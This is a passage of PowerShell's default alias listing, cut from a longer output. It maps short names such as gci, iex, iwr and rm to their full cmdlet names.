Format-Wide Alias gal -> Get-Alias Alias gbp -> Get-PSBreakpoint Alias gc -> Get-Content Alias gci -> Get-ChildItem Alias gcm -> Get-Command Alias gcs -> Get-PSCallStack Alias gdr -> Get-PSDrive Alias ghy -> Get-History Alias gi -> Get-Item Alias gjb -> Get-Job Alias gl -> Get-Location Alias gm -> Get-Member Alias gmo -> Get-Module Alias gp -> Get-ItemProperty Alias gps -> Get-Process Alias gpv -> Get-ItemPropertyValue Alias group -> Group-Object Alias gsn -> Get-PSSession Alias gsnp -> Get-PSSnapIn Alias gsv -> Get-Service Alias gu -> Get-Unique Alias gv -> Get-Variable Alias gwmi -> Get-WmiObject Alias h -> Get-History Alias history -> Get-History Alias icm -> Invoke-Command Alias iex -> Invoke-Expression Alias ihy -> Invoke-History Alias ii -> Invoke-Item Alias ipal -> Import-Alias Alias ipcsv -> Import-Csv Alias ipmo -> Import-Module Alias ipsn -> Import-PSSession Alias irm -> Invoke-RestMethod Alias ise -> powershell_ise.exe Alias iwmi -> Invoke-WMIMethod Alias iwr -> Invoke-WebRequest Alias kill -> Stop-Process Alias lp -> Out-Printer Alias ls -> Get-ChildItem Alias man -> help Alias md -> mkdir Alias measure -> Measure-Object Alias mi -> Move-Item Alias mount -> New-PSDrive Alias move -> Move-Item Alias mp -> Move-ItemProperty Alias mv -> Move-Item Alias nal -> New-Alias Alias ndr -> New-PSDrive Alias ni -> New-Item Alias nmo -> New-Module Alias npssc -> New-PSSessionConfigurationFile Alias nsn -> New-PSSession Alias nv -> New-Variable Alias ogv -> Out-GridView Alias oh -> Out-Host Alias popd -> Pop-Location Alias ps -> Get-Process Alias pushd -> Push-Location Alias pwd -> Get-Location Alias r -> Invoke-History Alias rbp -> Remove-PSBreakpoint Alias rcjb -> Receive-Job Alias rcsn -> Receive-PSSession Alias rd -> Remove-Item Alias rdr -> Remove-PSDrive Alias ren -> Rename-Item Alias ri -> Remove-Item Alias rjb -> Remove-Job Alias rm -> Remove-Item Alias rmdir -> Remove-Item Alias rmo -> Remove-Module Alias rni -> Rename-Item Alias rnp -> Rename-ItemProperty Alias rp -> Remove-ItemProperty Alias rsn -> Remove-PSSession Alias rsnp -> Remove-PSSnapin Alias rujb -> Resume-Job Alias rv -> Remove-Variable Alias rvpa -> Resolve-Path Alias rwmi -> Remove-WMIObject Alias sajb -> Start-Job Alias sal -> Set-Alias Alias saps -> Start-Process Alias sasv -> Start-Service Alias sbp -> Set-PSBreakpoint Alias sc -> Set-Content Alias select -> Select-Object Alias set -> Set-Variable Alias shcm -> Show-Command Alias si -> Set-Item Alias sl -> Set-Location Alias sleep -> Start-Sleep Alias sls -> Select-String Alias sort -> Sort-Object Alias sp -> Set-ItemProperty Alias spjb -> Stop-Job Alias spps -> Stop-Process Alias spsv -> Stop-Service Alias start -> Start-Process Alias sujb -> Suspend-Job Alias sv -> Set-Variable Alias swmi -> Set-WMIInstance Alias tee -> Tee-Object Alias trcm -> Trace-Command Alias type -> Get-Content Alias wget -> Invoke-WebRequest Alias where -> Where-Object Alias wjb -> Wait-Job Alias write -> Write-Output |